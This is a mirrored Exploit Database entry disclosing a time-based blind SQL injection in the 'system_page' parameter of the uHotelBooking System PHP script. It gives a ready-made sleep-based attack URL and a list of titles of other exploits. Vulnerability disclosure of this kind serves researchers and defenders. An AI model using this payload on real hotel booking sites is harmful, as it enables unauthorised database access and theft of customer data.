uHotelBooking System – ‘system_page’ SQL Injection

Exploit Database
13 阅读

作者： Ahmet Ümit BAYRAM

日期： 2019-03-21
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/46587/

# Exploit Title: uHotelBooking System - 'system_page' SQL Injection
# Date: 21.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.hotel-booking-script.com
# Demo Site: https://www.hotel-booking-script.com/demo/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
# Description: uHotelBooking is a powerful hotel management and online
booking/reservation site script.

----- PoC: SQLi -----

Request: http://localhost/[PATH]/index.php
Vulnerable Parameter: system_page (GET)
Attack Pattern:
http://locahost/[PATH]/index.php?page=3&system_page=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z

last Exploits
uHotelBooking System – ‘system_page’ SQL Injection的更多信息

AJ Matrix 3.1 – ‘id’ Multiple SQL Injections：
WHMCompleteSolution (WHMCS) 4.x/5.x – Multiple Web Vulnerabilities：
Netsweeper 4.0.8 – Authentication Bypass (via Disabling of IP Quarantine)：
Built2Go PHP Shopping – Cross-Site Request Forgery (Admin Password)：
XiongMai uc-httpd 1.0.0 – Buffer Overflow：
Zomplog 3.9 – Cross-Site Request Forgery：
CANDID – ‘/image/view.php?image_id’ Cross-Site Scripting：
Basic Analysis and Security Engine (BASE) 1.4.5 – ‘index.php?base_path’ Remote File Inclusion：